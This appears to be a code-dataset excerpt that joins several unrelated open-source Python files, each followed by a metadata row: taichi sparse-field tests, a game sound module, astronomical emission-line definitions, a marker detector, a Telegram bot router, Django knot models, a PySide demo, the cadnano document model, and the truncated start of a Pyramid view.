@archs_support_bitmasked
def test_deactivate():
# https://github.com/taichi-dev/taichi/issues/778
a = ti.field(ti.i32)
a_a = ti.root.bitmasked(ti.i, 4)
a_b = a_a.dense(ti.i, 4)
a_b.place(a)
c = ti.field(ti.i32)
ti.root.place(c)
@ti.kernel
def run():
a[0] = 123
@ti.kernel
def is_active():
c[None] = ti.is_active(a_a, [0])
@ti.kernel
def deactivate():
ti.deactivate(a_a, [0])
run()
is_active()
assert c[None] == 1
deactivate()
is_active()
assert c[None] == 0
@archs_support_bitmasked
def test_sparsity_changes():
x = ti.field(ti.i32)
c = ti.field(ti.i32)
s = ti.field(ti.i32)
bm = ti.root.bitmasked(ti.i, 5).bitmasked(ti.i, 3)
bm.place(x)
ti.root.place(c, s)
@ti.kernel
def run():
for i in x:
s[None] += x[i]
c[None] += 1
# Only two elements of |x| are activated
x[1] = 2
x[8] = 20
run()
assert c[None] == 2
assert s[None] == 22
c[None] = 0
s[None] = 0
# Four elements are activated now
x[7] = 15
x[14] = 5
run()
assert c[None] == 4
assert s[None] == 42
@archs_support_bitmasked
def test_bitmasked_offset_child():
x = ti.field(ti.i32)
x2 = ti.field(ti.i32)
y = ti.field(ti.i32)
y2 = ti.field(ti.i32)
y3 = ti.field(ti.i32)
z = ti.field(ti.i32)
s = ti.field(ti.i32, shape=())
n = 16
# Offset children:
# * In |bm|'s cell: |bm2| has a non-zero offset
# * In |bm2|'s cell: |z| has a non-zero offset
# * We iterate over |z| to test the listgen handles offsets correctly
bm = ti.root.bitmasked(ti.i, n)
bm.dense(ti.i, 16).place(x, x2)
bm2 = bm.bitmasked(ti.i, 4)
bm2.dense(ti.i, 4).place(y, y2, y3)
bm2.bitmasked(ti.i, 4).place(z)
@ti.kernel
def func():
for _ in z:
s[None] += 1
z[0] = 1
z[7] = 1
z[42] = 1
z[53] = 1
z[88] = 1
z[101] = 1
z[233] = 1
func()
assert s[None] == 7
| mit | 2,388,788,574,790,093,000 | 18.577869 | 79 | 0.528365 | false |
jemofthewest/GalaxyMage | src/Sound.py | 1 | 2427 | # Copyright (C) 2005 Colin McMillen <[email protected]>
#
# This file is part of GalaxyMage.
#
# GalaxyMage is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# GalaxyMage is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GalaxyMage; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA.
# You may import this module only after the pygame mixer module has
# been initialized.
import Resources
import pygame
_quiet = False
_mixerInit = pygame.mixer.get_init() != None
if _mixerInit:
_cursorChannel = pygame.mixer.Channel(0)
_actionChannel = pygame.mixer.Channel(1)
else:
_quiet = True
_cursorChannel = None
_actionChannel = None
def _play(channel, sound):
if not _mixerInit:
return
if not _quiet and sound != None:
channel.play(sound)
def setQuiet(quiet):
global _quiet
if not _mixerInit:
return
_quiet = quiet
if _quiet:
pygame.mixer.pause()
pygame.mixer.music.pause()
else:
pygame.mixer.unpause()
pygame.mixer.music.unpause()
def toggleQuiet():
setQuiet(not _quiet)
def playMusic(musicName):
"""Changes background music."""
if not _mixerInit:
return
if not _quiet:
Resources.music(musicName)
def playTune(tuneName):
"""Plays a short tune. Returns whether it was actually played."""
if _mixerInit and not _quiet:
Resources.music(tuneName, loop=False)
return True
else:
return False
def cursorClick():
s = Resources.sound("cursor-click")
_play(_cursorChannel, s)
def cursorCancel():
s = Resources.sound("cursor-cancel")
_play(_cursorChannel, s)
def cursorMove():
s = Resources.sound("cursor-move")
_play(_cursorChannel, s)
def cursorInvalid():
s = Resources.sound("cursor-invalid")
_play(_cursorChannel, s)
def action(sound):
s = Resources.sound(sound)
_play(_actionChannel, s)
| gpl-2.0 | -3,338,352,428,866,749,400 | 23.765306 | 70 | 0.679852 | false |
JohanComparat/pySU | galaxy/python/lineListAir.py | 1 | 4082 | """
Script loading the atomic properties from the pyNEB package.
Mostly line transitions.
Input to the line fitting procedures
"""
import numpy as n
from scipy.interpolate import interp1d
import pyneb as pn
# Conversion from Morton (1991, ApJS, 77, 119) wavelength in Angstrom
# SDSS spectra are in the vacuum, therefore the ref wavelengths of the lines must be in the vacuum.
AIR = lambda VAC : VAC / (1.0 + 2.735182e-4 + 131.4182 / VAC**2 + 2.76249e8 / VAC**4)
vacs=n.arange(1000,12000,0.01)
airs=AIR(vacs)
VAC = interp1d(airs,vacs)
# Wavelengths from pyNeb Atoms are in A in vacuum like the SDSS spectra. No need to convert.
C3 = pn.Atom('C', 3)
#C3.printIonic()
C3_1908=AIR(1/(C3.getEnergy(C3.getTransition(1908)[0])-C3.getEnergy(C3.getTransition(1908)[1])))
C4 = pn.Atom('C', 4)
#C4.printIonic()
C4_1548=AIR(1/(C4.getEnergy(C4.getTransition(1548)[0])-C4.getEnergy(C4.getTransition(1548)[1])))
O2 = pn.Atom('O', 2)
#O2.printIonic()
O2_3727=AIR(1/(O2.getEnergy(O2.getTransition(3727)[0])-O2.getEnergy(O2.getTransition(3727)[1])))
O2_3729=AIR(1/(O2.getEnergy(O2.getTransition(3729)[0])-O2.getEnergy(O2.getTransition(3729)[1])))
#O2=AIR((O2_3727+O2_3729)/2.)
O2_mean=(O2_3727*3.326568+O2_3729*3.324086)/(3.326568 + 3.324086)
Ne3 = pn.Atom('Ne',3)
#Ne3.printIonic()
Ne3_3869=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3869)[0])-Ne3.getEnergy(Ne3.getTransition(3869)[1])))
Ne3_3968=AIR(1/(Ne3.getEnergy(Ne3.getTransition(3968)[0])-Ne3.getEnergy(Ne3.getTransition(3968)[1])))
O3 = pn.Atom('O', 3)
#O3.printIonic()
O3_4363=AIR(1/(O3.getEnergy(O3.getTransition(4363)[0])-O3.getEnergy(O3.getTransition(4363)[1])))
O3_4960=AIR(1/(O3.getEnergy(O3.getTransition(4960)[0])-O3.getEnergy(O3.getTransition(4960)[1])))
O3_5007=AIR(1/(O3.getEnergy(O3.getTransition(5007)[0])-O3.getEnergy(O3.getTransition(5007)[1])))
O1 = pn.Atom('O', 1)
O1_5578=AIR(1/(O1.getEnergy(O1.getTransition(5578)[0])-O1.getEnergy(O1.getTransition(5578)[1])))
O1_6302=AIR(1/(O1.getEnergy(O1.getTransition(6302)[0])-O1.getEnergy(O1.getTransition(6302)[1])))
O1_6365=AIR(1/(O1.getEnergy(O1.getTransition(6365)[0])-O1.getEnergy(O1.getTransition(6365)[1])))
N2 = pn.Atom('N', 2)
#N2.printIonic()
N2_5756=AIR(1/(N2.getEnergy(N2.getTransition(5756)[0])-N2.getEnergy(N2.getTransition(5756)[1])))
N2_6549=AIR(1/(N2.getEnergy(N2.getTransition(6549)[0])-N2.getEnergy(N2.getTransition(6549)[1])))
N2_6585=AIR(1/(N2.getEnergy(N2.getTransition(6585)[0])-N2.getEnergy(N2.getTransition(6585)[1])))
S2 = pn.Atom('S', 2)
#S2.printIonic()
S2_6718=AIR(1/(S2.getEnergy(S2.getTransition(6718)[0])-S2.getEnergy(S2.getTransition(6718)[1])))
S2_6732=AIR(1/(S2.getEnergy(S2.getTransition(6732)[0])-S2.getEnergy(S2.getTransition(6732)[1])))
Ar3 = pn.Atom('Ar', 3)
#Ar3.printIonic()
Ar3_7137=AIR(1/(Ar3.getEnergy(Ar3.getTransition(7137)[0])-Ar3.getEnergy(Ar3.getTransition(7137)[1])))
# Wavelengths from pyNeb RecAtoms are in A in Air like the SDSS spectra. Conversion needed.
H1=pn.RecAtom('H',1) # Hydrogen Balmer series
H1_3970=H1.getWave(7,2)
H1_4102=H1.getWave(6,2)
H1_4341=H1.getWave(5,2)
H1_4862=H1.getWave(4,2)
H1_6564=H1.getWave(3,2)
H1=pn.RecAtom('H',1) # Hydrogen Lyman series
H1_1216=H1.getWave(2,1)
He1=pn.RecAtom('He',1) # Helium
He2=pn.RecAtom('He',2) # Helium
He2_4686=He2.getWave(4,3)
He2_5411=He2.getWave(7,4)
# Limits for the 4000 A fit
#dl4k=150
#intLim4k=n.array([3950-dl4k, 3950, 4050, 4050+dl4k])
#intLim4k=n.array([3600-dl4k, 3600, 4140, 4140+dl4k])
# limits for th eUV luminosities fits
#intLimUV=n.array([2000,2200,3000,3200,3400,3600,4100,4300,4500,4700])
# system at 2360
# cmin1,cmax1=2080.,2240.
#em1=2326.7
#abs1=2343.7
#em2=2365.3
#aTR=2370.
#abs2=2374.3
#abs3=2382.2
#em3=2396.2
# cmin2,cmax2=2400.,2550.
#a0s2360=n.array([em1,abs1,em2,abs2,abs3,em3])
# system at 2600
#em1=2586.1
#em2=2599.6
#aTR=2606.
#abs1=2612.5
#abs2=2626.3
#cmin1,cmax1=2400.,2550.
#cmin2,cmax2=2650.,2770.
#a0s2600=n.array([em1,em2,abs1,abs2])
# system at 2800
#Mga=2795.
#Mgb=2802.
#aTR=2798.
#cmin1,cmax1=2650.,2770.
#cmin2,cmax2=2807., 2840.
#a0s2800=n.array([Mga,Mgb])
# abs2852=3851.9
# cmin2,cmax2=2870.,3000.
| cc0-1.0 | -7,262,391,922,114,196,000 | 31.141732 | 101 | 0.715091 | false |
black-knight/magic_lamp | Server/src/board/markers/marker.py | 1 | 2739 | import cv2
from board.board_descriptor import BoardDescriptor
class Marker(object):
def __init__(self, marker_id):
"""
:param marker_id: Marker ID
"""
self.marker_id = marker_id
def preferred_input_image_resolution(self):
"""
Returns the preferred input resolution for this marker detector. Defaults to medium.
:return: Input resolution (of type BoardDescriptor.SnapshotSize)
"""
return BoardDescriptor.SnapshotSize.MEDIUM
def find_markers_in_image(self, image):
"""
Find all markers in image.
:param image: Image
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return []
def find_markers_in_thresholded_image(self, image):
"""
Find all markers in image which has already been thresholded.
:param image: Image
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return []
def find_marker_in_image(self, image):
"""
Find marker in image.
:param image: Image
:return: Marker in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return None
def find_marker_in_thresholded_image(self, image):
"""
Find marker in image which has already been thresholded.
:param image: Thresholded image
:return: Marker in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return None
def contour_to_marker_result(self, image, contour):
"""
Extracts marker result from contour.
:param image: Image
:param contour: Contour
:return: Result in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
image_height, image_width = image.shape[:2]
box = cv2.minAreaRect(contour)
return {"markerId": self.marker_id,
"x": float(box[0][0]) / float(image_width),
"y": float(box[0][1]) / float(image_height),
"width": float(box[1][0]) / float(image_width),
"height": float(box[1][1]) / float(image_height),
"angle": box[2],
"contour": contour}
def contours_to_marker_result(self, image, contours):
"""
Extracts marker results from contours.
:param image: Image
:param contours: Contours
:return: List of markers each in form {"markerId", "x", "y", "width", "height", "angle", "contour"}
"""
return [self.contour_to_marker_result(image, contour) for contour in contours]
| apache-2.0 | 6,870,595,627,794,209,000 | 31.607143 | 107 | 0.56517 | false |
JulyJ/MindBot | mindbot/router.py | 1 | 2824 | """
Module designed to route messages based on strategy pattern.
This module includes class mapper tuple to correlate received from telegram
user command with target command class to run. Additionally, this module
generates help message based on command list.
"""
from typing import Any, Dict
from .command.help.commands import GreetingsCommand, HelpCommand
from .command.nasa.apod import APODCommand
from .command.nasa.asteroid import AsteroidCommand
from .command.nasa.curiosity import CuriosityCommand
from .command.search.google import GoogleCommand
from .command.search.wiki import WikiCommand, RandomCommand
from .command.search.urban import UrbanDictionaryCommand
from .command.search.dictionary import DictionaryCommand
from .command.weather.weather import WeatherCommand
from .command.weather.forecast import ForecastCommand
from .command.exchange.exchange import ExchangeCommand
from .command.remember.rememberall import RememberAll
from .command.remember.searchtag import SearchTagCommand
from .command.comics.xkcd import XkcdCommand
from .command.tools.qrgenerator import QrCommand
from .command.tools.ocr import OcrCommand
from .command.news.hackernews import LatestNewsCommand, TopNewsCommand, BestNewsCommand
from .command.news.canadanews import CanadaStatsCommand
class CommandRouter:
command_class_mapper = (
('/help', HelpCommand),
('/asteroid', AsteroidCommand),
('/start', GreetingsCommand),
('/canadastat', CanadaStatsCommand),
('/oxford', DictionaryCommand),
('/exchange', ExchangeCommand),
('/forecast', ForecastCommand),
('/google', GoogleCommand),
('/search', SearchTagCommand),
('/urban', UrbanDictionaryCommand),
('/weather', WeatherCommand),
('/curiosity', CuriosityCommand),
('/qr', QrCommand),
('/ocr', OcrCommand),
('/apod', APODCommand),
('/wiki', WikiCommand),
('/random', RandomCommand),
('/xkcd', XkcdCommand),
('/latestnews', LatestNewsCommand),
('/topnews', TopNewsCommand),
('/bestnews', BestNewsCommand),
('/remember', RememberAll),
)
@classmethod
def route(cls, message: Dict[str, Any]):
command, _, query = message['text'].partition(' ')
command = command.lower()
if command not in dict(cls.command_class_mapper):
return
command_class = dict(cls.command_class_mapper).get(command, None)
command_instance = command_class(cls, query, message)
return command_instance()
@classmethod
def get_commands_help(cls):
return (
(command, command_class.help_text)
for command, command_class in cls.command_class_mapper
if command_class.help_text is not None
)
| mit | -6,548,554,171,890,835,000 | 37.684932 | 87 | 0.695467 | false |
althalus/knotcrafters | knotdirectory/knotdirectory/knots/models.py | 1 | 2886 | from django.db import models
from taggit.managers import TaggableManager
from django.core.urlresolvers import reverse
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib.auth import get_user_model
User = get_user_model()
class Knot(models.Model):
name = models.CharField(max_length=90, help_text="Commonly accepted name for this tie")
other_names = models.TextField(help_text="Is this knot known by other names? One name per line, please", blank=True)
creator_name = models.CharField(max_length=90, help_text="Who should we credit for discovering this tie")
creator = models.ForeignKey('CreatorProfile', blank=True, null=True, editable=False)
notes = models.TextField(help_text="Any other information? Markdown text enabled.", blank=True)
tags = TaggableManager()
date_added = models.DateTimeField(auto_now_add=True)
date_updated = models.DateTimeField(auto_now=True)
photo = models.ImageField(upload_to="knotsimages/%Y/%m/", help_text="A photo of the completed tie.")
def save(self):
if not self.creator:
try:
self.creator = CreatorProfile.objects.get(name=self.creator_name)
except CreatorProfile.DoesNotExist:
cp = CreatorProfile()
cp.name = self.creator_name
cp.save()
self.creator = cp
super(Knot, self).save()
def get_absolute_url(self):
return reverse("knots.detail", args=[self.pk, ])
def __unicode__(self):
return u'%s' % self.name
class Link(models.Model):
knot = models.ForeignKey(Knot)
link = models.URLField(help_text="Link ot the guide")
name = models.CharField(max_length=90, help_text="A descriptive name for this guide")
def __unicode__(self):
return u'Link %s on knot %s' % (self.name, self.knot.name)
class Action(models.Model):
content_type = models.ForeignKey(ContentType)
object_id = models.PositiveIntegerField()
content_object = generic.GenericForeignKey('content_type', 'object_id')
user = models.ForeignKey(User)
when = models.DateTimeField(auto_now=True)
what = models.TextField()
def __unicode__(self):
return u'%s: %s %s %s' % (self.when, self.user, self.what, self.content_object)
class CreatorProfile(models.Model):
name = models.CharField(max_length=90)
link_facebook_profile = models.URLField(blank=True)
link_youtube_channel = models.URLField(blank=True)
link_website = models.URLField(blank=True)
email = models.EmailField(blank=True)
user = models.ForeignKey(User, blank=True, null=True)
bio = models.TextField(blank=True, null=True)
def __unicode__(self):
return u'%s' % self.name
def get_absolute_url(self):
return reverse("creators.detail", args=[self.pk, ])
| mit | -6,894,886,796,592,600,000 | 37.48 | 120 | 0.682259 | false |
LogikSim/LogikSimPython | src/debug/pyside_bugs/nonimplemented_virtual_methods.py | 1 | 1739 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Copyright 2014 The LogikSim Authors. All rights reserved.
Use of this source code is governed by the GNU GPL license that can
be found in the LICENSE.txt file.
Nonimplemented virtual methods can lead to event handling Problems.
Run the script as it is and you will observe the following issues:
- Frame cannot be closed kindly only by killing the process
- Resizing the Program leads to strange error messages:
QPainter::begin: Paint device returned engine == 0, type: 0
Proposed changes:
- Detect unresolvable virtual methods and print appropriate error message
Workaround for this example:
Uncomment:
def sizeHint(self, *args):
return self.rect().size()
"""
import sys
from PySide import QtGui
class TestRect(QtGui.QGraphicsRectItem, QtGui.QGraphicsLayoutItem):
def __init__(self, *args, **kargs):
QtGui.QGraphicsRectItem.__init__(self, *args, **kargs)
QtGui.QGraphicsLayoutItem.__init__(self, *args, **kargs)
self.setRect(0, 0, 200, 100)
def setGeometry(self, rect):
self.setRect(rect)
# def sizeHint(self, *args):
# return self.rect().size()
def add_rect_with_layout(scene):
item1 = TestRect()
item2 = TestRect()
scene.addItem(item1)
scene.addItem(item2)
layout = QtGui.QGraphicsGridLayout()
layout.addItem(item1, 0, 0)
layout.addItem(item2, 0, 1)
form = QtGui.QGraphicsWidget()
form.setLayout(layout)
scene.addItem(form)
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
add_rect_with_layout(scene)
view = QtGui.QGraphicsView()
view.setScene(scene)
view.show()
app.exec_()
| gpl-3.0 | 7,154,451,987,703,996,000 | 22.186667 | 77 | 0.677976 | false |
JMMolenaar/cadnano2.5 | cadnano/document.py | 1 | 19668 | #!/usr/bin/env python
# encoding: utf-8
from operator import itemgetter
import cadnano.util as util
import cadnano.preferences as prefs
from cadnano.cnproxy import ProxyObject, ProxySignal
from cadnano.cnproxy import UndoStack, UndoCommand
from cadnano.strand import Strand
from cadnano.oligo import Oligo
from cadnano.strandset import StrandSet
from cadnano.virtualhelix import VirtualHelix
from cadnano.part import Part
from cadnano.part import HoneycombPart
from cadnano.part import SquarePart
from cadnano import app
class Document(ProxyObject):
"""
The Document class is the root of the model. It has two main purposes:
1. Serve as the parent all Part objects within the model.
2. Track all sub-model actions on its undoStack.
"""
def __init__(self, parent=None):
super(Document, self).__init__(parent)
self._undostack = UndoStack()
self._parts = []
self._assemblies = []
self._controller = None
self._selected_part = None
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
app().documentWasCreatedSignal.emit(self)
# end def
### SIGNALS ###
documentPartAddedSignal = ProxySignal(object,
ProxyObject,
name='documentPartAddedSignal') # doc, part
# dict of tuples of objects using the reference as the key,
# and the value is a tuple with meta data
# in the case of strands the metadata would be which endpoints of selected
# e.g. { objectRef: (value0, value1), ...}
documentSelectedChangedSignal = ProxySignal(dict,
name='documentSelectedChangedSignal') # tuples of items + data
documentSelectionFilterChangedSignal = ProxySignal(list,
name='documentSelectionFilterChangedSignal')
documentViewResetSignal = ProxySignal(ProxyObject,
name='documentViewResetSignal')
documentClearSelectionsSignal = ProxySignal(ProxyObject,
name='documentClearSelectionsSignal')
### SLOTS ###
### ACCESSORS ###
def undoStack(self):
"""
This is the actual undoStack to use for all commands. Any children
needing to perform commands should just ask their parent for the
undoStack, and eventually the request will get here.
"""
return self._undostack
def parts(self):
"""Returns a list of parts associated with the document."""
return self._parts
def assemblies(self):
"""Returns a list of assemblies associated with the document."""
return self._assemblies
### PUBLIC METHODS FOR QUERYING THE MODEL ###
def selectedPart(self):
return self._selected_part
def addToSelection(self, obj, value):
self._selection_dict[obj] = value
self._selected_changed_dict[obj] = value
# end def
def removeFromSelection(self, obj):
if obj in self._selection_dict:
del self._selection_dict[obj]
self._selected_changed_dict[obj] = (False, False)
return True
else:
return False
# end def
def clearSelections(self):
"""
Only clear the dictionary
"""
self._selection_dict = {}
# end def
def addStrandToSelection(self, strand, value):
ss = strand.strandSet()
if ss in self._selection_dict:
self._selection_dict[ss][strand] = value
else:
self._selection_dict[ss] = {strand: value}
self._selected_changed_dict[strand] = value
# end def
def removeStrandFromSelection(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
temp = self._selection_dict[ss]
if strand in temp:
del temp[strand]
if len(temp) == 0:
del self._selection_dict[ss]
self._selected_changed_dict[strand] = (False, False)
return True
else:
return False
else:
return False
# end def
def selectionDict(self):
return self._selection_dict
# end def
def selectedOligos(self):
"""
as long as one endpoint of a strand is in the selection, then the oligo
is considered selected
"""
s_dict = self._selection_dict
selected_oligos = set()
for ss in s_dict.keys():
for strand in ss:
selected_oligos.add(strand.oligo())
# end for
# end for
return selected_oligos if len(selected_oligos) > 0 else None
#end def
def clearAllSelected(self):
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentClearSelectionsSignal.emit(self)
# end def
def isModelSelected(self, obj):
return obj in self._selection_dict
# end def
def isModelStrandSelected(self, strand):
ss = strand.strandSet()
if ss in self._selection_dict:
if strand in self._selection_dict[ss]:
return True
else:
return False
else:
return False
# end def
def getSelectedValue(self, obj):
"""
obj is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[obj]
def getSelectedStrandValue(self, strand):
"""
strand is an objects to look up
it is prevetted to be in the dictionary
"""
return self._selection_dict[strand.strandSet()][strand]
# end def
def sortedSelectedStrands(self, strandset):
# outList = self._selection_dict[strandset].keys()
# outList.sort(key=Strand.lowIdx)
out_list = [x for x in self._selection_dict[strandset].items()]
getLowIdx = lambda x: Strand.lowIdx(itemgetter(0)(x))
out_list.sort(key=getLowIdx)
return out_list
# end def
def determineStrandSetBounds(self, selected_strand_list, strandset):
min_low_delta = strandset.partMaxBaseIdx()
min_high_delta = strandset.partMaxBaseIdx() # init the return values
ss_dict = self._selection_dict[strandset]
# get the StrandSet index of the first item in the list
ss_idx = strandset._findIndexOfRangeFor(selected_strand_list[0][0])[2]
ss_list = strandset._strand_list
len_ss_list = len(ss_list)
max_ss_idx = len_ss_list - 1
i = 0
for strand, value in selected_strand_list:
while strand != ss_list[ss_idx]:
# incase there are gaps due to double xovers
ss_idx += 1
# end while
idxL, idxH = strand.idxs()
if value[0]: # the end is selected
if ss_idx > 0:
low_neighbor = ss_list[ss_idx - 1]
if low_neighbor in ss_dict:
valueN = ss_dict[low_neighbor]
# we only care if the low neighbor is not selected
temp = min_low_delta if valueN[1] \
else idxL - low_neighbor.highIdx() - 1
# end if
else: # not selected
temp = idxL - low_neighbor.highIdx() - 1
# end else
else:
temp = idxL - 0
# end else
if temp < min_low_delta:
min_low_delta = temp
# end if
# check the other end of the strand
if not value[1]:
temp = idxH - idxL - 1
if temp < min_high_delta:
min_high_delta = temp
# end if
if value[1]:
if ss_idx < max_ss_idx:
high_neighbor = ss_list[ss_idx + 1]
if high_neighbor in ss_dict:
valueN = ss_dict[high_neighbor]
# we only care if the low neighbor is not selected
temp = min_high_delta if valueN[0] \
else high_neighbor.lowIdx() - idxH - 1
# end if
else: # not selected
temp = high_neighbor.lowIdx() - idxH - 1
# end else
else:
temp = strandset.partMaxBaseIdx() - idxH
# end else
if temp < min_high_delta:
min_high_delta = temp
# end if
# check the other end of the strand
if not value[0]:
temp = idxH - idxL - 1
if temp < min_low_delta:
min_low_delta = temp
# end if
# increment counter
ss_idx += 1
# end for
return (min_low_delta, min_high_delta)
# end def
def getSelectionBounds(self):
min_low_delta = -1
min_high_delta = -1
for strandset in self._selection_dict.keys():
selected_list = self.sortedSelectedStrands(strandset)
temp_low, temp_high = self.determineStrandSetBounds(
selected_list, strandset)
if temp_low < min_low_delta or min_low_delta < 0:
min_low_delta = temp_low
if temp_high < min_high_delta or min_high_delta < 0:
min_high_delta = temp_high
# end for Mark train bus to metro
return (min_low_delta, min_high_delta)
# end def
# def operateOnStrandSelection(self, method, arg, both=False):
# pass
# # end def
def deleteSelection(self, use_undostack=True):
"""
Delete selected strands. First iterates through all selected strands
and extracts refs to xovers and strands. Next, calls removeXover
on xoverlist as part of its own macroed command for isoluation
purposes. Finally, calls removeStrand on all strands that were
fully selected (low and high), or had at least one non-xover
endpoint selected.
"""
xoList = []
strand_dict = {}
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
strand5p = strand.connection5p()
strand3p = strand.connection3p()
# both ends are selected
strand_dict[strand] = selected[0] and selected[1]
# only look at 3' ends to handle xover deletion
sel3p = selected[0] if idxL == strand.idx3Prime() else selected[1]
if sel3p: # is idx3p selected?
if strand3p: # is there an xover
xoList.append((part, strand, strand3p, use_undostack))
else: # idx3p is a selected endpoint
strand_dict[strand] = True
else:
if not strand5p: # idx5p is a selected endpoint
strand_dict[strand] = True
if use_undostack and xoList:
self.undoStack().beginMacro("Delete xovers")
for part, strand, strand3p, useUndo in xoList:
Part.removeXover(part, strand, strand3p, useUndo)
self.removeStrandFromSelection(strand)
self.removeStrandFromSelection(strand3p)
self._selection_dict = {}
self.documentClearSelectionsSignal.emit(self)
if use_undostack:
if xoList: # end xover macro if it was started
self.undoStack().endMacro()
if True in strand_dict.values():
self.undoStack().beginMacro("Delete selection")
else:
return # nothing left to do
for strand, delete in strand_dict.items():
if delete:
strand.strandSet().removeStrand(strand)
if use_undostack:
self.undoStack().endMacro()
def paintSelection(self, scafColor, stapColor, use_undostack=True):
"""Delete xovers if present. Otherwise delete everything."""
scaf_oligos = {}
stap_oligos = {}
for strandset_dict in self._selection_dict.values():
for strand, value in strandset_dict.items():
if strand.isScaffold():
scaf_oligos[strand.oligo()] = True
else:
stap_oligos[strand.oligo()] = True
if use_undostack:
self.undoStack().beginMacro("Paint strands")
for olg in scaf_oligos.keys():
olg.applyColor(scafColor)
for olg in stap_oligos.keys():
olg.applyColor(stapColor)
if use_undostack:
self.undoStack().endMacro()
def resizeSelection(self, delta, use_undostack=True):
"""
Moves the selected idxs by delta by first iterating over all strands
to calculate new idxs (method will return if snap-to behavior would
create illegal state), then applying a resize command to each strand.
"""
resize_list = []
# calculate new idxs
for strandset_dict in self._selection_dict.values():
for strand, selected in strandset_dict.items():
part = strand.virtualHelix().part()
idxL, idxH = strand.idxs()
newL, newH = strand.idxs()
deltaL = deltaH = delta
# process xovers to get revised delta
if selected[0] and strand.connectionLow():
newL = part.xoverSnapTo(strand, idxL, delta)
if newL == None:
return
deltaH = newL-idxL
if selected[1] and strand.connectionHigh():
newH = part.xoverSnapTo(strand, idxH, delta)
if newH == None:
return
deltaL = newH-idxH
# process endpoints
if selected[0] and not strand.connectionLow():
newL = idxL + deltaL
if selected[1] and not strand.connectionHigh():
newH = idxH + deltaH
if newL > newH: # check for illegal state
return
resize_list.append((strand, newL, newH))
# end for
# end for
# execute the resize commands
if use_undostack:
self.undoStack().beginMacro("Resize Selection")
for strand, idxL, idxH in resize_list:
Strand.resize(strand, (idxL, idxH), use_undostack)
if use_undostack:
self.undoStack().endMacro()
# end def
def updateSelection(self):
"""
do it this way in the future when we have
a better signaling architecture between views
"""
# self.documentSelectedChangedSignal.emit(self._selected_changed_dict)
"""
For now, individual objects need to emit signals
"""
for obj, value in self._selected_changed_dict.items():
obj.selectedChangedSignal.emit(obj, value)
# end for
self._selected_changed_dict = {}
# for ss in self._selection_dict:
# print self.sortedSelectedStrands(ss)
# end def
def resetViews(self):
# This is a fast way to clear selections and the views.
# We could manually deselect each item from the Dict, but we'll just
# let them be garbage collect
# the dictionary maintains what is selected
self._selection_dict = {}
# the added list is what was recently selected or deselected
self._selected_changed_dict = {}
self.documentViewResetSignal.emit(self)
# end def
### PUBLIC METHODS FOR EDITING THE MODEL ###
def addHoneycombPart(self, max_row=prefs.HONEYCOMB_PART_MAXROWS,
max_col=prefs.HONEYCOMB_PART_MAXCOLS,
max_steps=prefs.HONEYCOMB_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = HoneycombPart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def addSquarePart(self, max_row=prefs.SQUARE_PART_MAXROWS,
max_col=prefs.SQUARE_PART_MAXCOLS,
max_steps=prefs.SQUARE_PART_MAXSTEPS):
"""
Create and store a new DNAPart and instance, and return the instance.
"""
dnapart = None
if len(self._parts) == 0:
dnapart = SquarePart(document=self, max_row=max_row,
max_col=max_col, max_steps=max_steps)
self._addPart(dnapart)
return dnapart
def removeAllParts(self):
"""Used to reset the document. Not undoable."""
self.documentClearSelectionsSignal.emit(self)
for part in self._parts:
part.remove(use_undostack=False)
# end def
def removePart(self, part):
self.documentClearSelectionsSignal.emit(self)
self._parts.remove(part)
### PUBLIC SUPPORT METHODS ###
def controller(self):
return self._controller
def setController(self, controller):
"""Called by DocumentController setDocument method."""
self._controller = controller
# end def
def setSelectedPart(self, newPart):
if self._selected_part == newPart:
return
self._selected_part = newPart
# end def
### PRIVATE SUPPORT METHODS ###
def _addPart(self, part, use_undostack=True):
"""Add part to the document via AddPartCommand."""
c = self.AddPartCommand(self, part)
util.execCommandList(
self, [c], desc="Add part", use_undostack=use_undostack)
return c.part()
# end def
### COMMANDS ###
class AddPartCommand(UndoCommand):
"""
Undo ready command for deleting a part.
"""
def __init__(self, document, part):
super(Document.AddPartCommand, self).__init__("add part")
self._doc = document
self._part = part
# end def
def part(self):
return self._part
# end def
def redo(self):
if len(self._doc._parts) == 0:
self._doc._parts.append(self._part)
self._part.setDocument(self._doc)
self._doc.setSelectedPart(self._part)
self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
def undo(self):
self._doc.removePart(self._part)
self._part.setDocument(None)
self._doc.setSelectedPart(None)
self._part.partRemovedSignal.emit(self._part)
# self._doc.documentPartAddedSignal.emit(self._doc, self._part)
# end def
# end class
# end class
| mit | 5,810,336,417,466,848,000 | 35.831461 | 102 | 0.552725 | false |
CrystallineEntity/bulbs | bulbs/views/home.py | 1 | 1916 | from pyramid.view import view_config
from bulbs.components.subcategory import number_of_threads, number_of_posts, last_post
from bulbs.components import db
def catinfo(cat):
keys = "id", "title", "desc", "slug"
